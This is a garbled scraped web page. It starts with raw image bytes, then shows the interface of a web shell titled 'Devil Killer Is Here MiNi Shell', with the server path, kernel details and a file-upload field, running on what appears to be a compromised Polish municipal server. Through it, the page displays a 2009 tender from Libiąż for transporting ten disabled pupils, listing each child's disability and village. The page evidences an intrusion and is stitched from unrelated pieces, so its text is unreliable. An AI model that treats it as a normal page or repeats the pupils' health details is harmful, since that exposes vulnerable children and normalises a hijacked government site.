JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091012/175903-N-2009.html

<p class="kh_header"><b>Libiąż: Dowóz uczniów niepełnosprawnych na zajęcia lekcyjne - etap III</b><br>
<b>Numer ogłoszenia: 175903 - 2009; data zamieszczenia: 12.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zespół Administracyjny , ul. Ignacego Paderewskiego 2, 32-590 Libiąż, woj. małopolskie, tel. 032 6277338, 6271841, faks 032 6277338.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> poczta.onet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów niepełnosprawnych na zajęcia lekcyjne - etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na: Dowozie uczniów niepełnosprawnych na zajęcia lekcyjne - etap III
Wspólny słownik zamówień (CPV): 60100000-9; usługi w zakresie transportu drogowego.  Kategoria usług 2
Przedmiot zamówienia obejmuje wykonanie usług przewozowych, dowóz uczniów niepełnosprawnych z miejsca zamieszkania do szkoły na zajęcia lekcyjne oraz z powrotem po zajęciach, najkrótszą z możliwych tras, w okresie od listopada do 22 grudnia 2009 roku (z wyłączeniem dni wolnych od zajęć szkolnych), zgodnie z harmonogramem przewozów, sporządzanym według planu zajęć szkolnych. Poniższa tabela zawiera zestawienie liczby uczniów podlegających dowozowi wraz ze wskazaniem ich stopnia niepełnosprawności oraz placówki, do której są dowożeni. 
Lp.	Dowóz do placówki		Stopień niepełnosprawności	Miejsce zamieszkania
ucznia
1.	Szkoła Podstawowa Nr 4 z Oddziałami Integracyjnymi w Libiążu ul. Paderewskiego 2	1 uczeń	upośledzenie umysłowe	Żarki
2.		1 uczeń	niepełnosprawności sprzężone: niepełnosprawność ruchowa, niedowidzenie, upośledzenie umysłowe w stopniu lekkim	Żarki
3.		1 uczeń	zaburzenia zachowania	Żarki
4.		1 uczeń	zaburzenia zachowania	Libiąż
5.		1 uczeń	upośledzenie umysłowe stopnia umiarkowanego	Libiąż
6.		1 uczeń	upośledzenie umysłowe stopnia lekkiego	Libiąż
7.	Gimnazjum Nr 2 
w Libiążu ul. Paderewskiego 2 (budynek szkoły SP4)	1 uczeń	niepełnosprawność sprzężona: upośledzenie umysłowe, niepełnosprawność ruchowa 
(nie wymaga wózka)	Żarki
8.	1 uczeń	upośledzenie umysłowe w stopniu lekkimŻarki
9.Przedszkole Samorządowe Nr 1 z Oddziałami Integracyjnymi
w Libiążu ul. Plac Zwycięstwa 2 (budynek szkoły SP2)	1 uczeń	upośledzenie umysłowe w stopniu umiarkowanym	Żarki
10.1 uczeń	niepełnosprawność ruchowa	Libiąż
RAZEM:	10 uczniów + opiekun
W trakcie realizacji usługi w przypadku indywidualnych zmian godzin zajęć szkolnych należy kontaktować się z Dyrektorem Szkoły Podstawowej Nr 4 z Oddziałami Integracyjnymi, Dyrektorem Gimnazjum Nr 2 oraz Dyrektorem Przedszkola Samorządowego Nr 1 z Oddziałami Integracyjnymi w Libiążu.
Trasa przewozu obejmie Libiąż - Żarki - średnio ok. 64 km dziennie,
Usługa przewozowa obejmie około 36 dni,
Szacowana ilość uczniów objętych przewozem - 10 uczniów i opiekun = 11 osób.
Zamawiający zastrzega sobie możliwość zmiany ilości uczniów objętych przewozem, w wyniku sytuacji nieprzewidzianych w momencie podpisania umowy (np. związanych ze zmianą miejsca zamieszkania ucznia).
Ze względu na zapewnienie bezpieczeństwa przewozu uczniów, realizacja przedmiotu zamówienia może odbyć się przy pomocy pojazdu o odpowiednim stanie technicznym, sprawnych i dopuszczonych do ruchu, z aktualnym badaniem technicznym (należy dołączyć kopię dowodu rejestracyjnego), spełniających wymogi sanitarne i estetyczne, ogrzewanych wg potrzeb. Zamawiający wymaga, aby w trakcie przewozu zapewnić uczniom i opiekunowi miejsca siedzące.
Wykonawca w cenie 1 km (brutto) powinien ująć wszystkie dodatkowe koszty m.in.: ubezpieczenie pojazdu i dzieci, postoje, zapewnienie innego pojazdu o podobnych danych technicznych w przypadku awarii, oznakowanie pojazdu (przewóz dzieci) oraz wszystkie inne koszty związane z należytym utrzymaniem pojazdu.
Wykonawca w celu zapewnienia stałej łączności z Zamawiającym, powinien posiadać telefon komórkowy.
Wykonawca powinien w pełni przestrzegać bezpieczeństwa wszystkich przewożonych osób w pojeździe, zabezpieczyć na własny koszt wszelkie środki konieczne do udzielenia pierwszej pomocy w czasie przebywania pasażerów w pojeździe. Wykonawca powinien w czasie trwania umowy dbać o czystość i porządek w pojeździe.
Zalecane jest dokładne zapoznanie z przedmiotem zamówienia (warunkami przewozu).
Rozliczenia za wykonywaną usługę dokonywane będą miesięcznie. Wynagrodzenie w każdym miesiącu stanowić będzie iloczyn ilości faktycznie przejechanych i potwierdzonych km oraz stawki za jeden km (średnio ok. 64 km dziennie)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
a)posiadają licencję na podjęcie działalności gospodarczej w zakresie objętym przedmiotem zamówienia,
b)posiadają aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do działalności gospodarczej,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych. 
2.Ocena spełniania warunków dokonana zostanie na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów wymaganych postanowieniami w rozdziale V siwz, na podstawie formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający, w celu potwierdzenia przez Wykonawcę spełniania warunków udziału w postępowaniu, wymaga złożenia następujących oświadczeń lub dokumentów:
1.a) Stosowna licencja na wykonywanie krajowego transportu drogowego osób wymagana przez ustawę z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2007r. Nr 125 poz. 874 z późn. zm.).
b) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie ww. dokument musi być złożony przez każdego Wykonawcę.
2.Oświadczenie o spełnieniu wymogów udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 2 do siwz)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.malopolska.pl/bip/libiaz.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zespół Administracyjny w Libiążu, 32-590 Libiąż, ul. Paderewskiego 2, pokój nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2009 godzina 10:30, miejsce: Miejski Zespół Administracyjny w Libiążu, 32-590 Libiąż, ul. Paderewskiego 2, pokój nr 2 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com